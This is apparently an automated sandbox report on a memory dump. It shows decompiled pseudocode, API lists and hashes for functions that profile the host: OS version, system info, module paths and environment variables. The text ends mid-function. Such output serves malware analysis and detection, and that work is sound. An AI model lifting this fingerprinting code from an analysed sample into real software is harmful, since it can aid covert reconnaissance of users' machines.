0x000cba37
0x000cba3c
0x000cba5a
0x000cba5d
0x000cba3e
0x000cba41
0x000cba43
0x000cba4b
0x000cba4b
0x000cba4e
0x000cba4e
0x000cba61
0x000cba22
0x000cba22
0x000cba22

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c71d26ea1c7d67146cd9b950da2090079754ff8c0595719dac4e2876920f872
Instruction ID: 1444dde37cf9ff6e32baa45f932119c6418e42d8efec47e869b3358f31e80b18
Opcode Fuzzy Hash: 6c71d26ea1c7d67146cd9b950da2090079754ff8c0595719dac4e2876920f872
Instruction Fuzzy Hash: A2F06931A10208EFDF60EBA0C986FAE77F8EB04399F1140A9B441EB151DB74DE009B61

Uniqueness

Uniqueness Score: -1.00%

Function 000C5CEC, Relevance: 1.3, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000C5CEC(void* __ecx, void* __eflags, void* __fp0) {
				void _v44;
				signed int _t8;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t21;
				void* _t24;
				void* _t29;
				void* _t35;

				_t35 = __eflags;
				_t24 = __ecx;
				_t8 =  *0xde688; // 0xf0000
				E000D249B(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
				E000C85EF();
				E000C8F78();
				 *0xde780 = 0;
				 *0xde784 = 0;
				 *0xde77c = 0;
				E000C5EB6(); // executed
				E000CCF84(_t24);
				_t14 =  *0xde688; // 0xf0000
				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
				_t15 =  *0xde688; // 0xf0000
				E000CA86D( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7, _t35);
				E000CB337( &_v44);
				memset( &_v44, 0, 0x27);
				E000C5C26( &_v44, __fp0);
				_t21 =  *0xde684; // 0x27bf8f0
				 *((intOrPtr*)(_t21 + 0xdc))(0, _t29);
				return 0;
			}

0x000c5cec
0x000c5cec
0x000c5cef
0x000c5cfe
0x000c5d03
0x000c5d08
0x000c5d0f
0x000c5d15
0x000c5d1b
0x000c5d21
0x000c5d26
0x000c5d2b
0x000c5d33
0x000c5d3d
0x000c5d4b
0x000c5d53
0x000c5d5f
0x000c5d67
0x000c5d6c
0x000c5d72
0x000c5d7c

APIs

Part of subcall function 000C85EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,000C5FA7), ref: 000C85F8

Part of subcall function 000CCF84: GetCurrentProcess.KERNEL32(?,?,000F0000,?,000C3545), ref: 000CCF90
Part of subcall function 000CCF84: GetModuleFileNameW.KERNEL32(00000000,000F1644,00000105,?,?,000F0000,?,000C3545), ref: 000CCFB1
Part of subcall function 000CCF84: memset.MSVCRT ref: 000CCFE2
Part of subcall function 000CCF84: GetVersionExA.KERNEL32(000F0000,000F0000,?,000C3545), ref: 000CCFED
Part of subcall function 000CCF84: GetCurrentProcessId.KERNEL32(?,000C3545), ref: 000CCFF3

Part of subcall function 000CB337: CloseHandle.KERNELBASE(00000000,?,00000000,000C3C8A,?,?,?,?,?,?,?,?,000C3D6F,00000000), ref: 000CB36A

memset.MSVCRT ref: 000C5D5F

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: CurrentProcessmemset$CloseCreateFileHandleHeapModuleNameVersion
String ID:
API String ID: 4245722550-0
Opcode ID: fa89a80829d7a9760737cc4274533f209aa92eb7a2269d63f0a7b72384ce7043
Instruction ID: af213eb193222f81b8a95cd20b2ee53c4ca132bbc1b9434b2fcea704800a8989
Opcode Fuzzy Hash: fa89a80829d7a9760737cc4274533f209aa92eb7a2269d63f0a7b72384ce7043
Instruction Fuzzy Hash: 78011D715022549FF600FBA8DC8AEDD3BE4EF29350F45006AF8049B263DB74A545CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 000C861A, Relevance: 1.3, APIs: 1, Instructions: 33
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000C861A(int _a4, intOrPtr _a8) {
				int _t3;
				intOrPtr _t4;
				void* _t9;

				_t3 = _a4;
				if(_t3 == 0) {
					return _t3;
				}
				_t9 =  *_t3;
				if(_t9 != 0) {
					 *_t3 =  *_t3 & 0x00000000;
					_t4 = _a8;
					if(_t4 != 0xffffffff) {
						if(_t4 == 0xfffffffe) {
							_t4 = E000CC392(_t9);
						}
					} else {
						_t4 = E000CC379(_t9);
					}
					E000C874F(_t9, 0, _t4);
					_t3 = HeapFree( *0xde768, 0, _t9); // executed
				}
				return _t3;
			}

0x000c861d
0x000c8622
0x000c8668
0x000c8668
0x000c8625
0x000c8629
0x000c862b
0x000c862e
0x000c8634
0x000c8642
0x000c8646
0x000c8646
0x000c8636
0x000c8637
0x000c863c
0x000c864f
0x000c8660
0x000c8660
0x00000000

APIs

HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 29d119adc27ebfcbbca3d09bb5a218d10cee232c1cd15d8c43ca6c796faa6935
Instruction ID: bdf107fd91a53e23c3bc046cb1b94fcf4e343da30d7e73e1e878ef7509521b23
Opcode Fuzzy Hash: 29d119adc27ebfcbbca3d09bb5a218d10cee232c1cd15d8c43ca6c796faa6935
Instruction Fuzzy Hash: 94F0A031502624AFEA616B24EC01FAE37889F02B30F24C209F818AA1E1DF309D0087ED

Uniqueness

Uniqueness Score: -1.00%

Function 000CA77D, Relevance: 1.3, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000CA77D(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				void* _t6;
				void* _t10;
				long _t15;
				void* _t17;

				_t15 = 2;
				_t5 = E000CA5F7(_a4, _t15);
				_t17 = _t5;
				if(_t17 != 0) {
					_t6 = E000CA65C(_t17, _a8, _a12); // executed
					if(_t6 != 0) {
						CloseHandle(_t17);
						return 0;
					}
					_t10 = 0xfffffffe;
					return _t10;
				}
				return _t5 | 0xffffffff;
			}

0x000ca786
0x000ca787
0x000ca78c
0x000ca790
0x000ca79f
0x000ca7a7
0x000ca7b4
0x00000000
0x000ca7b7
0x000ca7ab
0x00000000
0x000ca7ab
0x00000000

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2e382b22e81275347063f2f55ddbba12819f7fbba9436c0590232eb544ecab76
Instruction ID: 530dcad075266c1156e77377669d94ddcef453a396c3f42a45d0ff379d1e2d4c
Opcode Fuzzy Hash: 2e382b22e81275347063f2f55ddbba12819f7fbba9436c0590232eb544ecab76
Instruction Fuzzy Hash: 55E09B3530861D6B8B2157A8AC50E9E3765AF4A77C7114716FD258F2D1CA30D84042D2

Uniqueness

Uniqueness Score: -1.00%

Function 000C98A6, Relevance: 1.3, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000C98A6(void* __eflags, intOrPtr _a4) {
				intOrPtr _t24;

				_t24 = _a4;
				if(E000CA4BF( *(_t24 + 0x1c), 0x3a98) >= 0) {
					CloseHandle( *(_t24 + 0x1c));
					 *((intOrPtr*)(_t24 + 0x18)) =  *((intOrPtr*)(_t24 + 8))( *((intOrPtr*)(_t24 + 0xc)));
					if(( *(_t24 + 0x14) & 0x00000001) == 0) {
						E000C984A(_t24, 1);
					}
					return  *((intOrPtr*)(_t24 + 0x18));
				}
				return 0;
			}

0x000c98aa
0x000c98bc
0x000c98ca
0x000c98d7
0x000c98da
0x000c98e1
0x000c98e1
0x00000000
0x000c98e6
0x00000000

APIs

CloseHandle.KERNELBASE(?), ref: 000C98CA

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 3630957e612100f342e4842c6b5e58546f75cb5bc4260129e5d56011a5f31b81
Instruction ID: 761c44297c6940bc27b2f576ce9d72b8e9fb3a67907d93a40376c24e364c2c1d
Opcode Fuzzy Hash: 3630957e612100f342e4842c6b5e58546f75cb5bc4260129e5d56011a5f31b81
Instruction Fuzzy Hash: E0F0A030300B009BC720AF22E848E5BBBE9EF56350700882DE986879A2DB35F8099790

Uniqueness

Uniqueness Score: -1.00%

Function 000CB337, Relevance: 1.3, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E000CB337(void* __ecx) {
				intOrPtr _t4;
				void* _t5;
				intOrPtr _t6;
				void* _t12;
				void* _t13;

				_t4 =  *0xde684; // 0x27bf8f0
				_t13 = 0;
				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
				_t12 = _t5;
				if(_t12 != 0) {
					_t6 =  *0xde684; // 0x27bf8f0
					_push(_t12);
					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
						_t13 = 1;
					}
					CloseHandle(_t12);
					return _t13;
				}
				return _t5;
			}

0x000cb337
0x000cb33f
0x000cb344
0x000cb34a
0x000cb34e
0x000cb350
0x000cb355
0x000cb35e
0x000cb362
0x000cb362
0x000cb36a
0x00000000
0x000cb36d
0x000cb371

APIs

CloseHandle.KERNELBASE(00000000,?,00000000,000C3C8A,?,?,?,?,?,?,?,?,000C3D6F,00000000), ref: 000CB36A

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 34c13cd0fe4e9c133c3b9b320e777d7b51e1db3172c1e3d0fe4fb5bf720220e4
Instruction ID: 952f55d8802c1bf5a37f67cca09105c85e7c47fe1d2e413aeb41e2f7cc7b4704
Opcode Fuzzy Hash: 34c13cd0fe4e9c133c3b9b320e777d7b51e1db3172c1e3d0fe4fb5bf720220e4
Instruction Fuzzy Hash: B2E04F32301160ABD6606B69EC8CF6B7BA9FB99A91F06016DF905CB151CB24C802C7B1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 000CD01F, Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 282
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E000CD01F(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				char _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				intOrPtr* _t88;
				intOrPtr _t90;
				intOrPtr _t95;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				char _t115;
				signed int _t117;
				char _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				char _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0xde69c; // 0x10000000
				_t81 = E000C8604(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0xde684; // 0x27bf8f0
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E000D2301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E000C8FBE(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E000CBA05();
				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
				_t178 =  *_t88;
				if(E000CBB8D( *_t88) == 0) {
					_t90 = E000CBA62(_t178, _t222);
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220
				 *((intOrPtr*)(_t222 + 0x218)) = E000CE3F1(_t12);
				 *((intOrPtr*)(_t222 + 0x21c)) = E000CE3B6(_t12);
				_push( &_v16);
				 *(_t222 + 0x224) = _t162;
				_push( &_v8);
				_v12 = 0x80;
				_push( &_v692);
				_v8 = 0x100;
				_push( &_v12);
				_t22 = _t222 + 0x114; // 0x114
				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
				_t95 =  *0xde68c; // 0x27bfab8
				_push(0);
				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
					GetLastError();
				}
				_t97 =  *0xde694; // 0x27bfa48
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E000C8FBE(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114
				_t103 = E000CB7A8(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E000CB67D(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E000C8FD8(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E000CD400(_t43, E000CC379(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E000CB88A(_t108, _t44, _t241);
				_t199 = GetCurrentProcess();
				 *((intOrPtr*)(_t222 + 0x101c)) = E000CBBDF(_t110);
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0xde684; // 0x27bf8f0
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E000C95E1(_t199, 0x10c);
				_t200 =  *0xde684; // 0x27bf8f0
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0xde684; // 0x27bf8f0
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E000C85D5( &_v8);
				_t124 =  *0xde684; // 0x27bf8f0
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E000C9640(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0xde684; // 0x27bf8f0
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0xde684; // 0x27bf8f0
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0xde684; // 0x27bf8f0
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0xde684; // 0x27bf8f0
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0xde684; // 0x27bf8f0
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0xde684; // 0x27bf8f0
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E000D2301(E000CD400(_t75, E000CC379(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E000D22D3( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E000C902D(1, _t79, 0x14, 0x1e,  &_v2680);
				 *((intOrPtr*)(_t222 + 0x1898)) = E000CCD33(_t79);
				return _t222;
			}

0x000cd01f
0x000cd029
0x000cd035
0x000cd03a
0x000cd03f
0x000cd3ff
0x000cd3ff
0x000cd04c
0x000cd052
0x000cd057
0x000cd05d
0x000cd06d
0x000cd079
0x000cd079
0x000cd082
0x000cd088
0x000cd08a
0x000cd093
0x000cd093
0x000cd09f
0x000cd0a3
0x000cd0a8
0x000cd0ae
0x000cd0b7
0x000cd0c5
0x000cd0cc
0x000cd0d1
0x000cd0d1
0x000cd0d2
0x000cd0b9
0x000cd0b9
0x000cd0b9
0x000cd0d8
0x000cd0e3
0x000cd0f1
0x000cd0f7
0x000cd0fb
0x000cd101
0x000cd108
0x000cd10f
0x000cd113
0x000cd11a
0x000cd11b
0x000cd128
0x000cd12a
0x000cd12f
0x000cd13c
0x000cd13e
0x000cd13e
0x000cd140
0x000cd14a
0x000cd156
0x000cd166
0x000cd16c
0x000cd172
0x000cd174
0x000cd185
0x000cd18b
0x000cd191
0x000cd196
0x000cd19c
0x000cd1a2
0x000cd1a7
0x000cd1ac
0x000cd1ac
0x000cd1b2
0x000cd1b2
0x000cd1bb
0x000cd1c7
0x000cd1cf
0x000cd1d3
0x000cd1d3
0x000cd1cf
0x000cd1d7
0x000cd1dd
0x000cd1e3
0x000cd1ea
0x000cd1fb
0x000cd201
0x000cd209
0x000cd210
0x000cd223
0x000cd229
0x000cd22e
0x000cd231
0x000cd234
0x000cd23a
0x000cd240
0x000cd242
0x000cd248
0x000cd251
0x000cd254
0x000cd254
0x000cd257
0x000cd25f
0x000cd26a
0x000cd270
0x000cd261
0x000cd263
0x000cd263
0x000cd279
0x000cd279
0x000cd27f
0x000cd287
0x000cd292
0x000cd297
0x000cd29d
0x000cd29f
0x000cd2ac
0x000cd2ad
0x000cd2ae
0x000cd2b9
0x000cd2bb
0x000cd2c2
0x000cd2c2
0x000cd2cc
0x000cd2d1
0x000cd2d6
0x000cd2d6
0x000cd2dc
0x000cd2e3
0x000cd2e4
0x000cd2f1
0x000cd304
0x000cd309
0x000cd30e
0x000cd317
0x000cd317
0x000cd31d
0x000cd322
0x000cd328
0x000cd32e
0x000cd333
0x000cd33c
0x000cd33e
0x000cd345
0x000cd345
0x000cd34b
0x000cd353
0x000cd358
0x000cd359
0x000cd35e
0x000cd367
0x000cd369
0x000cd374
0x000cd374
0x000cd37d
0x000cd385
0x000cd38c
0x000cd391
0x000cd3a0
0x000cd3b8
0x000cd3bf
0x000cd3cd
0x000cd3df
0x000cd3e6
0x000cd3f3
0x00000000

APIs

Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612

GetCurrentProcessId.KERNEL32 ref: 000CD046
GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 000CD082
GetCurrentProcess.KERNEL32 ref: 000CD09F
GetLastError.KERNEL32 ref: 000CD13E
GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 000CD16C
GetLastError.KERNEL32 ref: 000CD172
MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 000CD1C7
GetCurrentProcess.KERNEL32 ref: 000CD20E
memset.MSVCRT ref: 000CD229
GetVersionExA.KERNEL32(00000000), ref: 000CD234
GetCurrentProcess.KERNEL32(00000100), ref: 000CD24E
GetSystemInfo.KERNEL32(?), ref: 000CD26A
GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 000CD287

Strings

TEMP, xrefs: 000CD328, 000CD333, 000CD344
SystemDrive, xrefs: 000CD353, 000CD35E, 000CD373
%s\%s, xrefs: 000CD2F9
USERPROFILE, xrefs: 000CD2E4, 000CD312
TEMP, xrefs: 000CD2F3

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
API String ID: 3876402152-2706916422
Opcode ID: 37bcc01c9bc94b24e7331b634080c8e5ad094a8be6c0a042994241c4e1bd66b4
Instruction ID: bb5fc8c38e6f26cdcc8b067c3c65418d8cefabbea5c8d39083ed8debe4d40b99
Opcode Fuzzy Hash: 37bcc01c9bc94b24e7331b634080c8e5ad094a8be6c0a042994241c4e1bd66b4
Instruction Fuzzy Hash: A1B14C71600744ABE710EB74DD89FEE77E8EF58340F00446EF95AD7292EB74AA448B21

Uniqueness

Uniqueness Score: -1.00%

Function 000CDB3C, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E000CDB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E000CD523(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E000C8604(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E000C861A( &_v60, 0xfffffffe);
					E000CD5D7( &_v104);
					return _t320;
				}
				_t165 = E000C95E1(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E000C95E1(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E000C92E5(_t165);
				_v60 = _t322;
				E000C85D5( &_v52);
				E000C85D5( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E000C95E1(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E000C85D5( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E000C861A( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E000C91E3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E000C91E3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E000C8698(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E000C8604( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E000C861A(_t136, 0);
								E000C861A( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E000C91E3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E000C95E1(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E000C95E1(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E000C8604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E000C85D5( &_v92);
											E000C85D5( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E000C9640();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E000C8604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E000C95E1(_t283, 0x219);
